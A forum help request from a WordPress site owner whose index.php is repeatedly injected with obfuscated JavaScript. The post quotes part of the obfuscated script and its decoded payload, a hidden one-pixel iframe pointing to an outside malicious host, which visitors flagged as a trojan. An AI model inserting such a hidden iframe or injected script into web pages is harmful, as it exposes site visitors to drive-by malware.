size_ukHi guys,
I have a the latest wordpress installed and strong passwords but recently my root index.php keeps having a single line added to the first line. Below is a snippet of the code
<script language='javascript'>var qTbPndRDkwJlutcricKxUxEtI='';nfSlyjfZ='AsjuH';var lYjMVPyBNRjWFrj='elPQGexZleNfOzzJAaMkkzlTqyRybfPKNhztREiXZXUKmvXG';JlrmrXCfprpeygyuxRDrVtG='ptaWQnnPGeEyikhb';var bRtTmUNExebnOgU=0;ZeUEyxvnsz='lJJLhKl';var trpZvTo='%50%39%37%35%04%15%3F%4C%16%3C%05%72%58%
It continues lots more numbers and leter like this. I did some googling and found a java decriptor which when I put this code in came back with the following.
<iframe src="http://ner-aller.com/in.cgi?default" frameborder="0" scrolling="no" height="1" width="1" hspace="1" vspace="1" marginwidth="0" marginheight="0"></iframe>
So it seems somehow I am getting a iFrame added to the site? I know when the index.php file has changed because when I goto my site with out the www, the website won't load and gives an error on line 934 in pluggable.php. I have checked pluggable.php with a fresh one and the line of code seems the same.
This is the line in question
header("Location: $location", true, $status);
As soon as I take this script line of code out from index.php, everything works as normal again. If i goto my site without the www. works just fine. Some people that have tried to goto the site when the script code has been added has reported the site has a trojan. I am starting to go round in circles and haven;t found anyone with the same problem documented anywhere.
Any help will be greatfully appreciated!
Valdor